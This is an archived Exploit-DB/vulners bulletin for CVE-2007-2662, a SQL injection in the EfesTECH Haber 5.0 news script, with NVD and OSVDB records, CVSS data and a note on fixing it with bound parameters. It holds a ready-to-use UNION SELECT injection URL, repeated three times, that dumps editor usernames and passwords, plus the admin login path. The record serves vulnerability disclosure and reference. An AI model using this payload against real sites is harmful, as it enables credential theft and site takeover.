ID EDB-ID:3911
Type exploitdb
Reporter CyberGhost
Modified 2007-05-14T00:00:00
Description
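EfesTECH Haber 5.0 (id) Remote SQL Injection Vulnerability. CVE-2007-2662. Webapps exploit for php platform.
Per the NVD record for CVE-2007-2662, the id parameter of the top-level URI is used in a SQL statement without adequate validation, and the CVSS vector (Au:NONE) indicates no authentication is required. The "php platform" label appears to be a database classification rather than the application's real stack: the OSVDB record names default.asp as the affected script and the package is distributed from an ASP download site, so treat it as a classic ASP application when assessing exposure. The root-cause fix is to pass id as a bound query parameter (or reject any non-integer value) instead of building the statement from the raw request value.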
#Title: EfesTECH Haber v5,0 Remote SQL Injection Vulnerability
#Author: CyberGhost
#Demo Page: http://www.haberguvercini.com
#Script Page: http://aspindir.com/indir.asp?id=4899&sIslem=%DDndir
#Vuln.
#Username - Password:/?efestech=haber&id=-1+union+select+0,kulladi,2,3,sifre,5,6,7,8,9,0,1,2,3,4+from+editorler
#Admin Login : /editor
====================================
Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR
And All TURKISH HACKERS !
# milw0rm.com [2007-05-14]
{"id": "EDB-ID:3911", "hash": "73656448c1575ef3ad8476a28d41da2d", "type": "exploitdb", "bulletinFamily": "exploit", "title": "EfesTECH Haber 5.0 id Remote SQL Injection Vulnerability", "description": "EfesTECH Haber 5.0 (id) Remote SQL Injection Vulnerability. CVE-2007-2662. Webapps exploit for php platform", "published": "2007-05-14T00:00:00", "modified": "2007-05-14T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3911/", "reporter": "CyberGhost", "references": [], "cvelist": ["CVE-2007-2662"], "lastseen": "2016-01-31T19:35:31", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-01-31T19:35:31"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2662"]}, {"type": "osvdb", "idList": ["OSVDB:36014"]}], "modified": "2016-01-31T19:35:31"}, "vulnersScore": 7.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3911/", "sourceData": "#Title: EfesTECH Haber v5,0 Remote SQL Injection Vulnerability\n#Author: CyberGhost\n#Demo Page: http://www.haberguvercini.com\n#Script Page: http://aspindir.com/indir.asp?id=4899&sIslem=%DDndir\n\n#Vuln.\n\n#Username - Password:/?efestech=haber&id=-1+union+select+0,kulladi,2,3,sifre,5,6,7,8,9,0,1,2,3,4+from+editorler\n#Admin Login : /editor\n====================================\nThanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR\n\nAnd All TURKISH HACKERS !\n\n# milw0rm.com [2007-05-14]\n", "osvdbidlist": ["36014"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:59", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in EfesTECH Haber 5.0 allows remote attackers to execute arbitrary SQL commands via the id parameter to the top-level URI.", "modified": "2017-10-11T01:32:00", "id": "CVE-2007-2662", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2662", "published": "2007-05-14T23:19:00", "title": "CVE-2007-2662", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "## Manual Testing Notes\n/?efestech=haber&id=-1+union+select+0,kulladi,2,3,sifre,5,6,7,8,9,0,1,2,3,4+from+editorler\n## References:\n[Secunia Advisory ID:25247](https://secuniaresearch.flexerasoftware.com/advisories/25247/)\nISS X-Force ID: 34272\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3911\n[CVE-2007-2662](https://vulners.com/cve/CVE-2007-2662)\nBugtraq ID: 23960\n", "modified": "2007-05-14T06:48:56", "published": "2007-05-14T06:48:56", "href": "https://vulners.com/osvdb/OSVDB:36014", "id": "OSVDB:36014", "title": "EfesTECH Haber default.asp id Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}